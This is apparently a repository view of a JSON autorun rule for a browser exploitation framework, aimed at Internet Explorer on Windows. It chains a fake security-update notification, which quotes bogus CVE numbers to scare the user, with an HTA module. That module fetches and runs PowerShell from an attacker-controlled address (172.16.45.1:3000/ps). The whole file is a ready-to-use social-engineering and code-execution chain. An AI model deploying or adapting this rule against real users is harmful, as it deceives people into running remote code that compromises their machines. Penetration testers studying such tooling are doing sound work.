221fbddec2
* arerules: Remove os/browser properties with redundant 'ALL' values * Tools: Add Autorun REST examples * AutorunEngine: Cleanup, rename REST routes, use Core::Models in REST API
27 lines
714 B
JSON
27 lines
714 B
JSON
{
|
|
"name": "HTA PowerShell",
|
|
"author": "antisnatchor",
|
|
"browser": "IE",
|
|
"os": "Windows",
|
|
"os_version": ">= 7",
|
|
"modules": [
|
|
{
|
|
"name": "fake_notification",
|
|
"condition": null,
|
|
"options": {
|
|
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:"
|
|
}
|
|
},
|
|
{
|
|
"name": "hta_powershell",
|
|
"condition": null,
|
|
"options": {
|
|
"domain":"http://172.16.45.1:3000",
|
|
"ps_url":"/ps"
|
|
}
|
|
}],
|
|
"execution_order": [0,1],
|
|
"execution_delay": [0,500],
|
|
"chain_mode": "sequential"
|
|
}
|